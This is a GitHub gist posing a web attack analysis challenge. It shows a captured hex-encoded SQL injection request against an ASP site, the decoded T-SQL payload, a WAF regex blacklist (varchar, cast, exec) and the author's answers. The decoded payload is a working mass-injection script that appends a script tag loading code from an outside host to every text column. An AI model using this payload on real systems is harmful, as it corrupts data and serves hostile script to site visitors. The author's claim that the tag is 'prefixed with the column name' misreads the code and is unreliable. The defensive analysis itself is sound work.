Skip to content

Instantly share code, notes, and snippets.

@rdev5

rdev5/Analysis Challenge #1

Forked from rcbarnett-zz/Analysis Challenge #1
Last active September 22, 2015 21:42
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save rdev5/8b268b57305801e609fd to your computer and use it in GitHub Desktop.
Save rdev5/8b268b57305801e609fd to your computer and use it in GitHub Desktop.
Download ZIP
Web Attack Analysis Challenge #1
Raw
Analysis Challenge #1
Review this HTTP request -
GET /somedir/somfile.asp?arg1=SOMETHING;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522053454c45435420612e6e616d652c622e6e616d652046524f4d207379736f626a6563747320612c737973636f6c756d6e73206220574845524520612e69643d622e696420414e4420612e78747970653d27752720414e442028622e78747970653d3939204f5220622e78747970653d3335204f5220622e78747970653d323331204f5220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d525452494d28434f4e5645525428564152434841522834303030292c5b272b40432b275d29292b27273c736372697074207372633d73646f2e313030306d672e636e2f63737273732f772e6a733e3c2f7363726970743e27272729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f7220%20AS%20VARCHAR(4000));EXEC(@S);-- HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
Accept-Language: en-US
Accept-Encoding: deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)
Host: www.example.com
Connection: Close
Questions: Please provide as much detail as possible for steps used to answer these questions.
What type of attack is this?
Can you decode the attack payload?
What is the end goal of the attack?
How could a WAF detect and block this attack?
Raw
blacklist.txt
# case-insensitive regex list of patterns to block
# target: GET /somedir/somfile.asp?arg1=SOMETHING;DECLARE @S VARCHAR(4000);SET @S=CAST(0x... AS VARCHAR(4000));EXEC(@S);-- HTTP/1.1
# matches: varchar(, varchar (, varchar (
varchar\s*\(
# matches: cast(, cast (, cast (
cast\s*\(
# matches: exec(, exec (, exec (
exec\s*\(
Raw
payload.sql
DECLARE @T VARCHAR(255), @C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id
AND a.xtype='u'
AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=sdo.1000mg.cn/csrss/w.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;
@rdev5
Copy link
Author

rdev5 commented Sep 22, 2015

Q. What type of attack is this?
A. This is a SQLi attack with a hex encoded payload for obfuscation

Q. Can you decode the attack payload?
A. Yes: https://gist.github.com/rdev5/8b268b57305801e609fd#file-payload-sql

Q. What is the end goal of the attack?
A. Wholesale insert a <script ...></script> tag into any table column it has UPDATE privileges to in an attempt to include this script on a web page, prefixed with the column name (form of blind SQLi testing) for possibly further exploitation:

column_name<script src=sdo.1000mg.cn/csrss/w.js></script>

Q. How could a WAF detect and block this attack?
A. Blacklist one or more SQL command patterns: https://gist.github.com/rdev5/8b268b57305801e609fd#file-blacklist-txt

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment